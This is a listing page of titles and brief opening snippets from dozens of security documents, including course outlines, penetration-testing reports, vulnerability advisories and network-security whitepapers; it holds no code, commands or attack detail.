Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
Professional Penetration Testing Techniques and Vulnerability Assessment ...
Course Introduction Today Hackers are everywhere, if your corporate system connects to internet that means your system might be facing with hacker. This five days course Professional Vulnerability Assessment
CRYPTUS DIPLOMA IN IT SECURITY
CRYPTUS DIPLOMA IN IT SECURITY 6 MONTHS OF TRAINING ON ETHICAL HACKING & INFORMATION SECURITY COURSE NAME: CRYPTUS 6 MONTHS DIPLOMA IN IT SECURITY Course Description This is the Ethical hacking & Information
Automated Penetration Testing with the Metasploit Framework. NEO Information Security Forum March 19, 2008
Automated Penetration Testing with the Metasploit Framework NEO Information Security Forum March 19, 2008 Topics What makes a good penetration testing framework? Frameworks available What is the Metasploit
Penetration Testing Report. Client: xxxxxx Date: 19 th April 2014
1. Executive Summary Penetration Testing Report Client: xxxxxx Date: 19 th April 2014 On the 19th of April, a security assessment was carried out on the internal networks of xxxxxx, with the permission
PCI Compliance - A Realistic Approach. Harshul Joshi, CISM, CISA, CISSP Director, Information Technology CBIZ MHM [email protected]
PCI Compliance - A Realistic Approach Harshul Joshi, CISM, CISA, CISSP Director, Information Technology CBIZ MHM [email protected] What What is PCI A global forum launched in September 2006 for ongoing enhancement
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
Lucent VPN Firewall Security in 802.11x Wireless Networks
Lucent VPN Firewall Security in 802.11x Wireless Networks Corporate Wireless Deployment is Increasing, But Security is a Major Concern The Lucent Security Products can Secure Your Networks This white paper
Top 10 Security Checklist for SOHO Wireless LANs
Introduction Corporations, government agencies, the military, and enterprises in fact all medium to large scale wireless LANs have a different set of security requirements compared to the wireless LAN
MWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May 2010. Contents
Contents MWR InfoSecurity Security Advisory BT Home Hub SSID Script Injection Vulnerability 10 th May 2010 2010-05-10 Page 1 of 8 Contents Contents 1 Detailed Vulnerability Description... 5 1.1 Technical
Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
Automation of Post-Exploitation
Automation of Post-Exploitation (Focused on MS-Windows Targets) Mohammad Tabatabai Irani and Edgar R. Weippl Secure Business Austria, Favoritenstr. 16, A-1040 Vienna, Austria {mtabatabai,eweippl}@securityresearch.at
Using Free Tools To Test Web Application Security
Using Free Tools To Test Web Application Security Speaker Biography Matt Neely, CISSP, CTGA, GCIH, and GCWN Manager of the Profiling Team at SecureState Areas of expertise: wireless, penetration testing,
CEH Version8 Course Outline
CEH Version8 Course Outline Module 01: Introduction to Ethical Hacking Information Security Overview Information Security Threats and Attack Vectors Hacking Concepts Hacking Phases Types of Attacks Information
Wireless Robust Security Networks: Keeping the Bad Guys Out with 802.11i (WPA2)
Wireless Robust Security Networks: Keeping the Bad Guys Out with 802.11i (WPA2) SUNY Technology Conference June 21, 2011 Bill Kramp FLCC Network Administrator Copyright 2011 William D. Kramp All Rights
CIT 480: Securing Computer Systems. Vulnerability Scanning and Exploitation Frameworks
CIT 480: Securing Computer Systems Vulnerability Scanning and Exploitation Frameworks Vulnerability Scanners Vulnerability scanners are automated tools that scan hosts and networks for potential vulnerabilities,
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
I Hunt Penetration Testers!
I Hunt Penetration Testers! More Weaknesses in Tools and Procedures Wesley McGrew, Ph.D. Distributed Analytics and Security Institute Mississippi State University http://mcgrewsecurity.com [email protected]
How To Test For Security On A Network Without Being Hacked
A Simple Guide to Successful Penetration Testing Table of Contents Penetration Testing, Simplified. Scanning is Not Testing. Test Well. Test Often. Pen Test to Avoid a Mess. Six-phase Methodology. A Few
Why The Security You Bought Yesterday, Won t Save You Today
9th Annual Courts and Local Government Technology Conference Why The Security You Bought Yesterday, Won t Save You Today Ian Robertson Director of Information Security Michael Gough Sr. Risk Analyst About
BYOD: BRING YOUR OWN DEVICE.
white paper BYOD: BRING YOUR OWN DEVICE. On-boarding and Securing Devices in Your Corporate Network Preparing Your Network to Meet Device Demand The proliferation of smartphones and tablets brings increased
Adobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
DiamondStream Data Security Policy Summary
DiamondStream Data Security Policy Summary Overview This document describes DiamondStream s standard security policy for accessing and interacting with proprietary and third-party client data. This covers
S E C U R I T Y A S S E S S M E N T : B o m g a r A p p l i a n c e s
S E C U R I T Y A S S E S S M E N T : B o m g a r A p p l i a n c e s During the period between November 2012 and March 2013, Symantec Consulting Services partnered with Bomgar to assess the security
From Rivals to BFF: WAF & VA Unite OWASP 07.23.2009. The OWASP Foundation http://www.owasp.org
From Rivals to BFF: WAF & VA Unite 07.23.2009 Brian Contos, Chief Security Strategist Imperva Inc. [email protected] +1 (650) 832.6054 Copyright The Foundation Permission is granted to copy, distribute
Application security testing: Protecting your application and data
E-Book Application security testing: Protecting your application and data Application security testing is critical in ensuring your data and application is safe from security attack. This ebook offers
Chapter 15: Computer and Network Security
Chapter 15: Computer and Network Security Complete CompTIA A+ Guide to PCs, 6e What is in a security policy Mobile device security methods and devices To perform operating system and data protection How
Penetration Test JSPLC. Contact: James, APS (CCNA, CEH) contactep105t@secure- mail.biz
Contact: James, APS (CCNA, CEH) contactep105t@secure- mail.biz Ok, so this isn t the typical way that a pen test report would start, but we might as well get straight in to it. I am a customer of Sainsbury
WiNG5 CAPTIVE PORTAL DESIGN GUIDE
WiNG5 DESIGN GUIDE By Sriram Venkiteswaran WiNG5 CAPTIVE PORTAL DESIGN GUIDE June, 2011 TABLE OF CONTENTS HEADING STYLE Introduction To Captive Portal... 1 Overview... 1 Common Applications... 1 Authenticated
Exam Questions SY0-401
Exam Questions SY0-401 CompTIA Security+ Certification http://www.2passeasy.com/dumps/sy0-401/ 1. A company has implemented PPTP as a VPN solution. Which of the following ports would need to be opened
The Trivial Cisco IP Phones Compromise
Security analysis of the implications of deploying Cisco Systems SIP-based IP Phones model 7960 Ofir Arkin Founder The Sys-Security Group [email protected] http://www.sys-security.com September 2002
